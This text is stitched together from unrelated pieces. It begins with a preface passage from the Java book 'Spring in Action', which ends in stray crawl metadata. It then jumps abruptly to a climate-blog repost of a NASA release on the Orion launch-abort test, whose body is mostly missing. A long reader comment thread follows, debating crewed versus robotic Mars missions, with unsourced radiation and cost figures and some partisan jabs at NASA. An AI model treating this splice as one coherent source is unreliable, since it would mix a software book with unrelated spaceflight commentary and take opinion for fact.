One of the key benefits of loose coupling is that it makes it easier to unit-test your application objects. Appendix B shows you how to take advantage of dependency injection and some of Spring’s test-oriented classes for testing your applications.
As I was writing this book, I wanted to cover as much of Spring as possible. I got a little carried away and ended up writing more than could fit into the printed book. Just like with many Hollywood movies, a lot of material ended up on the cutting room floor:
“Building portlet applications” This chapter covers the Spring Portlet MVC framework. Spring Portlet MVC is remarkably similar to Spring MVC (it even reuses some of Spring MVC’s classes), but is geared for the special circumstances presented by portlet applications.
Appendix C, “Spring XML configuration reference” This appendix documents all of the XML configuration elements available in Spring 2.0. In addition, it includes the configuration elements for Spring Web Flow and Direct Web Remoting (DWR).
Appendix D, “Spring JSP tag library reference” This appendix documents all of the JSP tags, both the original Spring JSP tags and the new form-binding tags from Spring 2.0.
Appendix E, “Spring Web Flow definition reference” This appendix catalogs all of the XML elements that are used to define a flow for Spring Web Flow.
Appendix F, “Customizing Spring configuration” This appendix, which was originally part of chapter 3, shows you how to create custom Spring XML configuration namespaces.
There’s some good stuff in there and I didn’t want that work to be for naught. So I convinced Manning to give it all of the same attention that it would get if it were to be printed and to make it available to download for free. You’ll be able to download this bonus material online at.
Spring in Action Second Edition is for all Java developers, but enterprise Java developers will find it particularly useful. While I will guide you along gently through code examples that build in complexity throughout each chapter, the true power of Spring lies in its ability to make enterprise applications easier to develop. Therefore, enterprise developers will most fully appreciate the examples presented in this book.
Because a vast portion of Spring is devoted to providing enterprise services, many parallels can be drawn between Spring and EJB. Therefore, any experience you have will be useful in making comparisons between these two frameworks.
Finally, while this book is not exclusively focused on web applications, a good portion of it is dedicated to this topic. In fact, the final four chapters demonstrate how Spring can support the development your applications’ web layer. If you are a web application developer, you will find the last part of this book especially valuable.
There are many code example throughout this book. These examples will always appear in a fixed-width code font. If there is a part of example we want you to pay extra attention to, it will appear in a bolded code font. Any class name, method name, or XML fragment within the normal text of the book will appear in code font as well.
Many of Spring’s classes and packages have exceptionally long (but expressive) names. Because of this, line-continuation markers (
) may be included when necessary.
Not all code examples in this book will be complete. Often we only show a method or two from a class to focus on a particular topic.
Complete source code for the application found throughout the book can be downloaded from the publisher’s website at or.
Craig Walls is a software developer with more than 13 years’ experience and is the coauthor of XDoclet in Action (Manning, 2003). He’s a zealous promoter of the Spring Framework, speaking frequently at local user groups and conferences and writing about Spring on his blog. When he’s not slinging code, Craig spends as much time as he can with his wife, two daughters, six birds, four dogs, two cats, and an ever-fluctuating number of tropical fish. Craig lives in Denton, Texas.
Purchase of Spring in Action includes free access to a private web forum run by Manning Publications where you can make comments about the book, ask technical questions, and receive help from the authors and from other users. To access the forum and subscribe to it, point your web browser to the author some challenging questions, lest his interest stray!
The Author Online forum and the archives of previous discussions will be accessible from the publisher’s website as long as the book is in print. | http://my.safaribooksonline.com/book/programming/java/9781933988139/about-this-book/pref05 | CC-MAIN-2014-15 | refinedweb | 1,841 | 59.64 |
The world's most viewed site on global warming and climate change
From NASA
July 2, 2019
RELEASE 19-054
Ascent Abort-2 successfully launched at 7 a.m. EDT from Space Launch Complex 46 at Cape Canaveral Air Force Station in Florida
Credits: NASA
For more information about NASA’s Moon to Mars exploration plans, visit:
-end-
Yes…I managed to get as far as my garden gate today…this has brought my trip to Antarctica that much closer!
One wonders what would have happened if NASA had carried on with lunar activities instead of ending the Apollo program. There was no real goal other than reaching the moon. 40 years of potential advance lost. Maybe they just didn’t have the technology. Landing a person on the moon may have happened 20 years too soon.
I can tell you what would have happened. Sooner rather than later a terrible accident would have occurred, claiming the lives of the astronauts involved. Since there was no clear goal, that would have put a long moratorium on space missions, similar to what happened with the space shuttle. Apollo 13 was already a close call. And after all, we still haven't found anything out there that makes it worth going in person.
Javier, it is imperative that we quickly disabuse the general public of the concept that spaceflight is safe, or that ANY exploration that humans have ever attempted was safe. “Safe” being a relative term. You’ll discover very little about the outside world from your couch, although you may be entertained by the discoveries of others.
A quick history survey will attest to this. Magellan never circumnavigated the globe. He died in transit. What risk is too great for exploration? For many, certainly not death.
As of 2018, there have been 18 astronaut and cosmonaut fatalities during spaceflight. Apollo only claimed 3 (and they weren’t even flying). We lost 7 with Challenger, and 7 more with Columbia.
There are numerous other fatalities that occurred during training (altitude chamber mishap, etc.)
As to your personal reason for not exploring being that we haven't found anything yet: isn't the purpose of exploring to find out what you don't know?
One word: Robotics
We didn’t have that in the 1960’s. We’ve had rovers soft-land Mars and running around on the surface for over 15 years now.
The Mars 2020 rover, which arrives at Mars in 2021, will collect rock and soil samples and store them for future return to Earth. But thus far, no plan has solidified on how, or even if, those samples will be returned.
But engineering and planning for a robotic Mars sample return (MSR) mission are already well underway.
Adding 3 or 4 humans to an 800-day interplanetary mission to Mars to get a few dozen kilos of Mars dirt and rocks is just a colossal, stupid waste of resources.
Robotics has its uses and history as well. We sent several robotic probes to the moon before we sent any men.
However, I will disagree on the capabilities of robot surveyors. A well-trained geologist will outperform any current robot. A geologist will not spend 3 weeks observing a rock that he can quickly discern is of less interest than the boulder sitting 3 feet away.
The best robots we have today are still less intelligent than your average scientist.
There is a further tacit reason why we conduct manned space missions and why we even attempt to analyze the data robots can collect: the purpose is to allow humans to fly through space to reach the places we've explored. If all we want to do is watch travelogues from robots, we have sci-fi for that.
The Orion system looks like an essential spacefaring capability, enabling manned trips beyond low Earth orbit. While I agree that space exploration is an excellent application for robots, I admire the USA for developing this manned capability.
I didn’t say we shouldn’t explore, but what is the rationale to send people? They take up lots of space and weight, requiring lots of life support systems with built in redundancy and in exchange they produce excrements. They make everything a lot more expensive and complicated.
Let’s just develop better AIs that can respond in real time. Humans are not fit for the purpose of space exploration. Robots are far superior.
I totally agree: send robots. And don't be a cheerleader for silly wastes of money.
Why go to Mars? No atmosphere. No water. Deadly radiation. What is the prize that is worth trying to solve problems which are impossible to solve with current physics and science?
A Mars colony is impossible as Mars does not have a magnetic field to protect it from cosmic and solar radiation.
Reducing the transit time to Mars, from roughly 3 years including the 500-day forced wait on Mars, requires an advanced propulsion system.
But again, why bother? What is the prize for going to Mars?
As there is no physically realistic solution to the radiation problem without a real breakthrough, spending money on manned spaceflight is a waste, and killing animals with radiation to find out how the Mars astronauts might die or get sick (diarrhea is a problem, as the bacteria in the gut are killed by the constant radiation) is …
Excerpt from a Scientific American article:
The perils of cosmic rays pose severe, perhaps insurmountable, hurdles to human spaceflight to Mars and beyond
By Eugene N. Parker
In a report published last August, they estimated that Mars astronauts would receive a dose of more than 80 rems a year.
By comparison, the legal dose limit for nuclear power plant workers in the U.S. is five rems a year. One in 10 male astronauts would eventually die from cancer, and one in six women (because of their greater vulnerability to breast cancer). What is more, the heavy nuclei could cause cataracts and brain damage. (To be sure, these numbers are highly uncertain.)
The galaxy is pervaded with fast-moving particles that can rip apart DNA and other molecules. Here at the surface of Earth, we are well protected from this cosmic radiation by the air mass overhead.
Astronauts in near equatorial orbits are shielded by the planet’s magnetic field.
But those who make long voyages away from Earth will suffer serious health consequences.
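The dose comparison in the excerpt is simple arithmetic, and a quick sketch makes the scale of the problem concrete. The 80 rem/year estimate and the roughly 3-year round trip come from the discussion above, and the 5 rem/year occupational limit is quoted in the excerpt; the code is purely illustrative:

```python
# Back-of-the-envelope cumulative radiation dose for a Mars round trip.
# Assumptions (from the excerpt and comments above): ~80 rem/year in deep
# space, ~3-year mission including the ~500-day forced wait on Mars.
DOSE_RATE_REM_PER_YEAR = 80
US_NUCLEAR_WORKER_LIMIT = 5   # rem/year, legal occupational limit

mission_years = 3
total_dose = DOSE_RATE_REM_PER_YEAR * mission_years
print(f"Total mission dose: {total_dose} rem")
print(f"Equivalent to {total_dose / US_NUCLEAR_WORKER_LIMIT:.0f} years "
      f"at the US nuclear-worker limit")
# -> Total mission dose: 240 rem
# -> Equivalent to 48 years at the US nuclear-worker limit
```

In other words, one mission delivers roughly half a century's worth of the maximum legal occupational exposure, which is why the excerpt's cancer estimates are so grim.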
A friend and colleague of mine, Rand Simberg, wrote an excellent book on the subject of space safety entitled Safe is Not an Option. His argument is, in essence, that the reason that safety is the first priority in NASA-style human space travel is that human space travel isn’t important. It was in the Apollo days (to show our superiority over the Soviets), but government-backed human space travel is no longer important.
Private space travel is important, and will continue to become more so. But the government need not fund it.
All too often one focuses on the objective and misses the true advancements and unspoken goals. The main purpose of the missions, "the goal", was to learn what it takes to accomplish these tasks and to see if we could actually accomplish the feat. If one blinkers one's vision and assumes the only goal of attending university is to receive a diploma, one misses the entire learning process and the journey itself.
During the Apollo program so much technology had to be invented from scratch, down to the fabrication materials. We had, and still have, very limited knowledge of our moon.
How might history have unwound if we had discovered extremely valuable minerals on the moon? Well, we did; it's just that extracting them is only now becoming profitable to consider.
The fact that individuals like Bezos and Musk are creating viable space ventures is only possible due to what has been already accomplished. Not just talked about, but actually accomplished.
“If I have seen further it is by standing on the shoulders of Giants.” Isaac Newton
I remember requests by entrepreneurs during the late 1990’s or so, to take possession of the large fuel tanks left in orbit by the space shuttle.
Some people apparently wanted to convert those tanks into hotels, for low-orbit vacations. NASA said no.
Here’s a BBC story on the idea:
I always regretted NASA’s lack of interest in, or cooperation with, that venture. It seemed a great opportunity and means to move into space.
The problem is that the large External Tank (ET, the big orange foam-covered cylinder) does not reach low Earth orbit (LEO) and falls into the Atlantic Ocean. It would require significant additional propellant, plus propulsion and guidance systems, to park the ETs in a stable LEO. Then there is the on-orbit accessibility issue. They have no docking mechanism, no grappling fixtures…the list goes on.
And…if you want to change orbits, that's another thing completely. It is far less expensive to build a new rocket and launch it where you want it than to significantly alter the orbital inclination of an existing object.
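The point about inclination changes can be made quantitative with the standard plane-change formula, dv = 2·v·sin(di/2). The orbital speed and the example inclinations below are illustrative assumptions, not figures from the thread:

```python
import math

# Why changing orbital inclination is so expensive: a simple plane-change
# delta-v estimate, dv = 2 * v * sin(di / 2), for a circular orbit.
v_leo_km_s = 7.7                      # typical circular LEO speed (assumed)
di_deg = 51.6 - 28.5                  # e.g. a Cape Canaveral orbit to ISS inclination
dv = 2 * v_leo_km_s * math.sin(math.radians(di_deg) / 2)
print(f"Plane change of {di_deg:.1f} deg costs ~{dv:.2f} km/s")
# -> Plane change of 23.1 deg costs ~3.08 km/s
```

Roughly 3 km/s is a substantial fraction of the delta-v needed to reach orbit in the first place, which is why relaunching is usually cheaper than repositioning.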
It's a nice sentiment until you actually consider the rocket engineering that would be necessary to provide this extra functionality. By the time you are finished, it will not be the same vehicle.
I think most of the shuttle external fuel tanks went into the Indian Ocean, jettisoned over Africa.
You are correct; I was thinking of the SRBs.
Still, if the companies wanted a try, I don’t see why NASA had to refuse letting them go ahead.
If they’d failed, no harm done except money spent (and maybe something learned). If they’d done something unexpected or innovative, so much the better.
But in any case, why not let them try?
Pat,
Who would be liable when (not if) a chunk of that orbited tank re-entered and landed on someone?
They were destructively disintegrated over the Indian Ocean, with a prescribed sub-orbital re-entry footprint, to ensure with high certainty that no surviving chunk would hit a land mass.
NASA lawyers think about those problems. They are very real. The hardware is theirs, from birth to fiery death, as long as it has a NASA logo on it anywhere.
Joel, I’d suppose that if some company bought the tank, they’d assume the liability.
One may also suppose they might have had some plan to raise the orbit a bit.
I’m assuming here the request was legitimate and serious. If so, the relevant company would have their own lawyers and their own engineers. One would hope for a realistic plan.
“I remember requests by entrepreneurs during the late 1990’s or so, to take possession of the large fuel tanks left in orbit by the space shuttle.
Some people apparently wanted to convert those tanks into hotels, for low-orbit vacations. NASA said no.”
NASA at one time had a space station design that utilized the large orange External Tank (153 ft long and 27.5 ft in diameter).
About 1994 NASA asked for space station designs and they settled on three designs: Option A, Option B, and Option C. Two of the space station designs, Options A and B, were designed around using the space shuttle to carry habitation modules in the shuttle cargo bay to be delivered to orbit, and would require dozens of space shuttle launches and a lot of time to get everything involved in orbit.
The Option C space station design was designed around using the Space Shuttle’s ET as the main body of the space station. This would be accomplished by adding a habitation module (15 ft in diameter by 15 ft long) to the bottom of the ET before launch. The habitation module would include everything the space station would need in orbit such as thrusters and life support.
The space shuttle could have launched this configuration all by itself, although it would have had to fly with an empty cargo bay in order to make orbit. Once in orbit, the ET space station would be able to move around on its own.
The ET space station would require a couple more shuttle launches to finish it. The second flight would bring up the solar panels; the third, miscellaneous supplies.
Option C was billions of dollars cheaper than Options A and B, was much less complicated, and could be put in orbit using only a few shuttle launches, whereas Options A and B required dozens of shuttle launches and years of construction in orbit.
Had NASA administrator Dan Goldin had any sense, he would have picked Option C. But he wasn’t interested in the fastest, cheapest way to develop the Earth/Moon/Mars system; instead he was interested in maximizing the use of the space shuttle, and Options A and B fit that program, so that’s what they went with.
We could have used three or four shuttle launches to put a huge ET space station in orbit (one ET had more volume than the International Space Station) at a cost of less than $10 billion. We could do this again and put an ET space station in orbit around the Moon, say at a cost of $15 billion (the extra cost is for the propellants needed to move the ET space station to the Moon). Then we could build a third ET space station and put this one around Mars for maybe $30 billion. Together, all of those projects are cheaper than the $100+ billion the International Space Station ended up costing.
So Goldin could have maximized using the space shuttle and developed the Earth/Moon/Mars system at the same time, but Goldin had no vision and he stuck us in low-Earth orbit for 20 years.
Then NASA throws away a perfectly good heavy-lift capability in the space shuttle launch system and spends more billions building a new heavy-lift vehicle that wouldn’t be any more capable than the space shuttle launch system. Spinning their wheels!
NASA bureaucrats are accomplished at wasting money. Lack of vision keeps us Earthbound and poorer.
I misstated the size of the habitat module on the Option C space station. It was to be 15 ft long and 27.5 ft in diameter, instead of 15 ft in diameter. I guess I was thinking about the diameter of space station modules carried inside the cargo bay (15 ft in diameter) when I wrote that.
Thanks for the detailed outline Tom. It seems very credible.
Here is a run-down of the option history. Option C had some problems, and apparently the various international partners didn’t like it because of the inconvenience of having to re-design their contributions.
It also seems option C suffered from a short design and test schedule. It would have benefited from a more deliberate developmental program.
I also seem to recall that Dan Goldin was opposed to the space shuttle at first, but came around when the space station was proposed. He said something like, the shuttle is “just the truck” to accomplish the mission.
Wouldn’t it have been special, though, to have had a space station as a chain of external fuel tanks and habitation modules?
It seems to me you’re right. Such a station could be put in orbit around the moon or Mars relatively cheaply, and be waiting there for people to arrive.
NASA are relying on the fact that the US public are so gullible about “saving lives” that if they send someone on a one-way journey to Mars, the public bombarded with daily sob stories from the “survivors” on Mars will cough up the eye-watering amounts that are needed to bring them back.
But I have no doubt that if you calculate the value of a life at perhaps $1 million each, then it’s far better to risk a few daft astronauts than take the money out of government spending which saves lives (like protecting from hurricanes).
It’s all about jobs for the boys at NASA.
Of course, it was the same idiotic Goebbels propaganda intent that is behind the global temperature data distortion by NASA … unless the public see a “problem” how will NASA get all the stupid US politicians to pay the eye-watering amounts to pop satellites into space to measure the global temperature (then tell us they don’t work when they don’t get the temperature rise they fiddled down on earth).
NASA is the biggest con trick … its only benefit to society has been an endless stream of self-publicising space clippings that have enabled almost every sci-fi fiction since NASA started. So, yes, if you’re a Star Trek, Star Wars, 2001: A Space Odyssey, etc. fan, it has had real benefits … but to actual science? Really? It’s clear to me the money wasted on NASA and their endless begging bowl to the US would have been far better spent elsewhere.
And I wouldn’t care what the US were wasting their money on, except the global warming scam is now set to cost us all in the UK around £30,000 (government estimate) or £200,000 (my more realistic figure), and so I’m sick to death of ALL the propaganda lies coming out of NASA.
If you are Scottish why do you care how the Americans spend their money
I’m with you, Mike. One should always spend all available resources on making our lives safer. People should not be allowed to rock climb, parachute, or fly for that matter. Risking money on an investment is stupid, because there is no guaranteed return, so take that money and invest it in safety. You can never invest too much money in safety, as people are so clever at 1) ignoring warnings, and 2) circumventing any safety measures devised.
Exploration is always silly. We should grow up and live out our lives in our parents’ house, because going outside is filled with risk. I myself have covered all the interior walls with bubble wrap to ensure that I am safe in the event of a fall. Not that I’m likely to fall – I remain firmly seated in front of my computer all day and night so as to minimize the dangers associated with moving around.
There is always the danger of someone getting irritated and coming after me for the snarky comments I leave on the internet. Maybe someone should take my computer away from me.
If you want to realize just how stupid people really are, just read the warning labels on things.
If it says:
Warning, do not take this internally…Someone did
Warning, not for consumption…Someone tried to eat it
Warning, do not use near water…Someone used it in the bathtub
Warning, not a flotation device…Someone drowned trying to float on it
For every warning message, there is a person that proved the need for it
Do your walls have buttons?
My walls had buttons…But I ate them all
I’m all for billionaires like Bezos or Musk spending their money on whatever legacy schemes to deep space they can dream up.
But I say, “Just keep your hands off my wallet to pay for that folly of manned Mars missions.”
You are correct in that much of the manned space flight activities of NASA is simply an expensive Jobs Program for engineers and scientists.
“The Orion test spacecraft traveled to an altitude of about six miles, at which point it experienced high-stress aerodynamic conditions expected during ascent.”
Isn’t that nice…
How does this protect rocket riders from internal fires and explosions?
I doubt the launch vehicle sticks around long enough to protect returning spaceship riders from re-entry hazards.
Which internal fires and explosions are you referring to?
The launch abort system is designed to safely extract the crew module, CM (where the astronauts sit) from any launch mishap. Mishaps are not only explosions, but also include trajectory failures (rockets flying wildly off course or tumbling). In such instances the launch vehicle will employ its launch destruct system (yes, they blow themselves up) to preclude the rocket from flying uncontrollably into populated areas (of course the launch abort system is fired first).
Think of the launch abort system like an ejection system for the pilot of an aircraft, only this system ejects the entire cockpit (like the F-111) with the astronauts still strapped into their seats. It is designed to perform from 0/0 (zero speed and zero altitude) until no longer needed, at which point, if not used, it will jettison itself. The reason they did an in-flight abort test was to assure the tractor rockets could safely distance the CM from a still fully firing launch vehicle. Static test firings have already proven its thrust, but the proof is in the pudding. There is far more to proving a system’s functionality than merely testing its components.
“’tis many a slip between cup and lip.”
The historical rocket accidents that actually killed America’s spacemen. Those are the fires and explosions to which I am referring.
Or are you claiming that NASA hid injuries and deaths from Americans?
Address the deadly effects first.
Address issues that send rockets off course or tumbling in the design and construction phases.
Address bad decisions by political animals by never allowing them to become managers in charge of people.
There was only one fire on the ground that killed people, and there were no explosions inside the capsule. At the time the capsule was filled with 100% oxygen, and everything burns in pure oxygen. NASA now uses an oxygen-nitrogen atmosphere and fireproof materials, so an internal fire is not likely.
I know they’ve tested the parachute system many times before but it seems a pity to waste an opportunity this time.
Alastair Brickell
My sources tell me the parachute system was not ready, so they pushed ahead with the test. Meeting milestones.
That is often the case in flight test. Specific test objectives and schedules take priority. Other “nice-to-have” systems will be deleted if they jeopardize primary objectives. I am not specifically familiar with the program schedule to know the level of system integration of the parachute system. But, the parachute system has previously been successfully tested.
These test articles are expensive and the test procedures are expensive. There is often significant program pressure to reduce unnecessary costs and inclusion of costly nice-to-haves often does not make the cut.
The future is truly unknowable. In the 1970s we all thought that cities in space and colonies on the Moon would happen in just a few decades, like the Space:1999 TV series from 1975 with Martin Landau showed.
Now is the turn of a new generation. Let’s see what the future holds. I now believe the future of mankind is linked to the rest of Earth’s species and there is little for us outside the Earth.
Our future is in the stars, Javier.
The meek shall inherit the Earth.
The brave shall inherit the stars.
Heinlein?
In about 6 billion years, when the Sun swells to red-giant phase and envelops the Earth, all the Earth’s surface will be cooked off and sent into space.
Then we’ll be in space, for sure.
Until then, and unless someone breaks Einstein’s GR and develops FTL ships, we’re committed to live and die on this beautiful blue water orb in a perfect goldilocks zone in a quiet galactic neighborhood.
We can (and have) sent out interstellar gold- and platinum-plated plaques to say we were here, like Ozymandias crying out his glory.
I recall reading about a fix for the sun going red giant by having Ceres orbit between Jupiter and Earth, thereby transmitting Jupiter’s orbital energy. Earth slowly moves to a larger orbit.
Apparently it would only take one Ceres pass every 6000 years or so to do the job.
Moving Ceres, of course, would take some effort. But still. 🙂
On the other topic, and having thought about it, it seems to me the collectivists will inherit Earth, and the individualists (the only free thinkers by principle) will head out to the stars.
My older brother was working for Varian when that plaque went out, Joel. Apparently the engineers at NASA Ames thought the male figure needed some appropriate embellishment (I’m being discreet here). So, they made and installed an alternate.
Unfortunately, the managers found it on a final inspection, and required the original to be replaced. More’s the pity. 🙂
Pat Frank
July 3, 2019 at 4:03 pm
I’m pretty sure it was the female figure that was the problem, not the male.
The designers of the Pioneer plaque originally had a small vertical line in the centre just below the hips of the female figure to provide more anatomical realism between the two figures but prudish NASA directors (or maybe their political masters) deleted it. Maybe they just wanted ET to know just how stupid the human race is/was.
My brother was pretty specific, Alastair. The improved male had an extension.
I’m not at all surprised by your story of the mannequinized female figure. Prudish managers projecting prudish space aliens.
I don’t buy it.
Two hundred years ago, Javier, people who thought like you would probably not have bought the idea that 500 people could be moved through the air at 39,000 feet and 550 mph.
Europe in 4 hr from Boston? Ha!
Technology always exceeds expectations.
Not a fan. Money is being wasted on manned spaceflight beyond LEO; the cost-benefit just doesn’t work when we now have robotics and AI to explore the solar system and land on rocky surfaces in gravity wells.
I’d rather see the money spent instead on robotic missions and other actual science activities like replacements for STEREO A/B, a lander mission to Europa, and space-based telescopes.
Given realities, any money “saved” will go to global warming or Muslim outreach or other useless PC proposals. All you are doing in effect is giving the Luddites a rationale.
Joel, robotic probes have their place as the vanguard of space exploration. Since we’ve had them, robots have always been the precursors of human arrival. But they are just that: preliminary testers. Their purpose is to determine whether it is possible (or even desirable), and what is necessary, for humans to survive in those locations. The purpose of robotic probes is not to populate a planet with robots.
We have one historical example of human space exploration of another surface. And the state of computer robotics in the 1960s and early 1970s was non-existent. The Viking landers were cool, but no one had to consider how to get off Mars once they got there.
The current manned concepts for Mars require a 400-day stay on the surface before a 200-day cruise-phase return can be completed. That’s 400 days of food, water, and oxygen for 3 or 4 adults: waste recycling, water recycling, oxygen generation from water, and most importantly copious electricity for heating due to -70 F nighttime temps. The electricity can come from solar, but you better hope there are no big dust storms, which can last for months, as RTGs are heavy, expensive, and don’t provide much power when you consider the heating and water-cycling/atmosphere needs of a human habitat.
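For a rough sense of that logistics burden, here is a back-of-the-envelope sketch of open-loop consumables mass. The per-person daily rates are my own assumed round numbers of the kind published in life-support studies, not figures from any actual mission plan:

```python
# Rough open-loop consumables estimate for a long Mars surface stay.
# Per-person daily rates below are assumptions, not mission-specific data.
O2_KG_PER_DAY = 0.84      # oxygen breathed per person
WATER_KG_PER_DAY = 3.5    # drinking plus food-prep water per person
FOOD_KG_PER_DAY = 1.8     # packaged food per person

def consumables_mass(crew, days, recycle_fraction=0.0):
    """Total consumables mass in tonnes. recycle_fraction is the share of
    water and oxygen recovered by closed-loop life support (food is not
    recycled)."""
    daily = O2_KG_PER_DAY + WATER_KG_PER_DAY + FOOD_KG_PER_DAY
    recoverable = O2_KG_PER_DAY + WATER_KG_PER_DAY
    effective = daily - recycle_fraction * recoverable
    return crew * days * effective / 1000.0

# 4 crew, 400 days, no recycling vs. 90% water/oxygen recovery:
print(consumables_mass(4, 400))       # ~9.8 tonnes open loop
print(consumables_mass(4, 400, 0.9))  # ~3.6 tonnes with 90% recovery
```

Even with aggressive recycling, several tonnes of consumables have to be landed or pre-positioned, which is why the waste- and water-recycling hardware matters so much.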
Then the crew needs to be on the surface for the entire time so that Mars’ limited atmosphere can provide additional radiation shielding from solar energetic particles and GCRs.
Manned Mars missions would be such a colossal waste of resources. And they will teach us nothing about Mars that we won’t already know by 2030 with all the robotic missions underway and those planned. And we’ll likely just kill the astronauts anyway with slow radiation poisoning, so the return vehicle will bring back corpses.
Perhaps if Obama hadn’t diverted NASA toward Global Warming projects, and programs to help Muslims feel good about their historical science development, we would never have gotten out of the orbital vehicle business in the first place, instead of having to bum a ride from the Russians to get to and from the ISS.
Survivable, but – boy – does that look like a rough ride.
Just as a point of information: NASA’s budget is a whopping $20 billion of the $4 trillion federal budget. That’s 0.5%.
Why is the government funding this project instead of funding SpaceX which is far ahead of the government project?
The government funds these so that any knowledge learned is in the public domain and not some company’s proprietary secret.
I personally have had patent applications shelved because no proprietary rights could be claimed for the inventions.
Mercenaries can be fast and inexpensive, but they are in it for themselves.
Between NASA GISS, the Challenger disaster, and the Columbia disaster, what would make anybody think that NASA can be trusted with human life? The administration has time and time again shown that, in their minds, politics takes precedence over safety. And with the way AI and robotics are being developed, what exactly would be the reason human lives would need to be risked in any mission?
Which means that either NASA gets a massive increase to pay for the manned phases when they start, or something elsewhere in the NASA budget gets a hit.
Personally I’d like to see GISS defunded entirely and their money split between JPL and GSFC programs. But GISS budget is just chump change compared to sending out a deep space probe mission.
Still it would be a return to some sanity for NASA.
In the 1960’s computers could be trusted to land on the Moon, gather samples, and return to Earth. Robotics and computers just weren’t advanced enough to pull that off. Today, that is definitely not the case, after soft-landing and running rovers all over Mars surface for 15 years now.
It’ll be hard to let go of “manned Mars”, but the likely lethal radiation hazards and the high cost do not justify the risks for the limited science return from a manned mission versus a robotic sample return mission.
The Moon and Mars manned stuff needs to be completely shelved, keep going to the ISS until it is time to de-orbit that platform. And then reassess/re-justify the need for even manned LEO missions post-ISS. Continue with robotic missions beyond LEO.
Adding the human component so dramatically raises costs and risk. Not worth it when so many other good missions need funding. We’ll likely learn nothing about the Moon or Mars we didn’t already know, and we are quite likely to lose people trying. The damage to national psyche would be tremendous.
The day a robotic mission finds an obelisk on the far-side of the Moon or on Ganymede, then we can think about sending a real human to make contact. But until then, I see no justification.
(g’errrrrata:)
In the 1960’s computers could **NOT** be trusted to land on the Moon…
Joel O’Bryan
July 3, 2019 at 12:27 pm
The Russians had unmanned sample return missions to the Moon in the early 1970’s.
“It’ll be hard to let go of “manned Mars”, but the likely lethal radiation hazards and the high cost do not justify the risks for the limited science return from a manned mission versus a robotic sample return mission.”
A one-meter-thick water ice envelope around habitation modules will solve the radiation problem in space.
Humans are going to Mars. It may not be by NASA people, but they are going. They think it is worth the risk and they have the money to pay for it.
I think there is no doubt that humans will be living and thriving in space within the next 50 years or sooner. Jeff Bezos, the multi-billionaire, is a student of Gerard O’Neill and he is going to put a human habitat in orbit as soon as he can.
Humans will have our own Dyson Sphere one of these days, imo.
On May 10th, 1869, the last spike was driven at Promontory Point UT, joining the Central Pacific and Union Pacific railways and creating the trans continental railroad spanning the United States of America. The steam powered locomotives and the electric telegraph that paralleled the rail route were technological leaps that forever changed transportation and communications as we know it. The western frontier was now easily accessible for commerce, direct communication, and human access.
Just one hundred years later, on July 16th 1969, Neil Armstrong, Buzz Aldrin and Michael Collins launched from Cape Canaveral on Apollo 11, riding atop the massive 3-stage Saturn V rocket and headed for a landing on the moon. At 4:17pm July 20, our nation received the radio message “The Eagle has landed!” The Lunar Lander, with Armstrong and Aldrin aboard, had safely landed on the moon. July 20th 1969, at 10:56pm, we watched Neil Armstrong on television as he stepped from the Lunar Lander onto lunar soil, declaring “That’s one small step for a man, one giant leap for Mankind.”
Consider: A span of just one hundred years between steam engines and telegraph communications to watching the first landing of men on the moon on our home television sets! Both were huge technological leaps. Neither were merely ‘stunts’. Only stunted perspectives could arrive at that conclusion.
Humans need new frontiers to daunt and intimidate us. We need that challenge to drive us ever forward, developing the new technologies essential for exploring new frontiers. Without these challenges, our race will devolve into increasingly trivial navel lint gazing exercises that sap the human spirit and leave the soul in despair. Look about you. It’s right in front of you. Look at the major cities through small towns that are infested with drugs, disease, and ideology driven human devolution. People without a frontier to conquer are rudderless, casting about for a ’cause’ to support, squabbling over resources, and slowly losing their humanity to anything that will temporarily ease their lack of purpose and despair of soul.
We should be better than this. We must be better, if the human race is to not merely survive but prosper and thrive! We need new frontiers….
We know what is on Mars. Engineers and scientists at JPL running rovers see it every day in HD technicolor, and get to drill and sample Mars rocks, look at dirt under a microscope, and heat it for gas-evolution study.
There is zero reason to send humans to that lethal environment to have them die slow agonizing deaths 100 million miles from Earth. No one on Earth could do anything but listen over the radio link as they slowly take their last gasping breaths with lungs filling with blood and fluid from chronic, lethal radiation poisoning.
Joel,
Re: “We know what is on Mars.”
We have traversed an exceedingly minute part of Mars with the exceedingly limited sampling/testing capabilities of our remote rovers. We have the barest glimpses of a minuscule bit of Mars, as a result. We know what is on Mars??? Talk about stunted perspectives!
Following that lilliputian leap of hubris, you argue with a sobbing emotional appeal the likes of PETA or WWF would be proud of. Pathetic.
Mankind is an inquisitive and inventive species. We learned how to deal with the lethal environments of our home planet, not just surviving but thriving in the process. We will learn how to deal with the lethal environments off planet. A permanent return to the moon is the second toddling step we must take to learn, survive, and thrive ‘out there’.
It’s in our genes! It’s what we do!
J Mac,
You simply don’t understand the environment any humans would be dealing with once outside of Earth’s geomagnetosphere.
Lethal interplanetary space radiation environments are not in our “genes.” It is a radiation environment to which we have zero years of adaptation. Apollo managed it with short-duration missions, under 10 days.
Curiosity rover has been on Mars now almost 7 years, operating continuously with its RTG power source, not needing to stop for the winter like the earlier rovers running on solar PV.
It has almost 13 miles on its odometer. And it’s still going, exploring, measuring, drilling.
NASA’s InSight mission, also currently underway on the surface, just deployed the thermal “heat spike” sensor called the Mole. The Heat Flow and Physical Properties Package (HP3), aka the self-hammering mole, is designed to dig down as much as 16 feet (5 meters) and take Mars’ temperature. Currently they are trying to get it to hammer its way through “cohesive soil” that isn’t providing the friction needed for the bit to keep drilling. But they’ll figure it out.
The Mars Opportunity rover last worked on 10 June 2018, after over 14 years navigating the surface and a whopping total odometry of 28.06 miles!!
Its twin, the Spirit rover, worked for 6 years, with an odometry of 4.8 miles in much more rugged terrain than Opportunity faced.
NASA JPL now has over 30 mobile rover-years on the surface of Mars under its belt, and over 45 miles of rover remote sensing. And that doesn’t count the stationary missions like Insight, Viking 1&2, and the Phoenix lander north polar mission.
But to put humans there:
Dealing with lethal radiation environments is done in some combination of 3 ways:
1. Sufficient Shielding,
2. Limiting exposure time, and lifetime limits.
3. Keeping the humans out entirely and using remote controlled devices.
RTG-powered Curiosity Rover is the ultimate example of #3. The human drivers sit safely in a Pasadena control room, sipping coffee in short-sleeve shirts, sending out long command sequences and then waiting typically 5 to 20 minutes for the video of what the rover did to come back.
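That delay is just light travel time over the Earth-Mars distance. A quick sketch, using approximate minimum and maximum ranges (the exact figures vary with each opposition):

```python
# One-way light time for a command/telemetry link to Mars.
C_KM_S = 299_792.458  # speed of light in km/s

def one_way_delay_min(distance_km):
    """One-way signal delay in minutes for a given Earth-Mars range."""
    return distance_km / C_KM_S / 60.0

# Approximate closest approach and maximum range (illustrative values):
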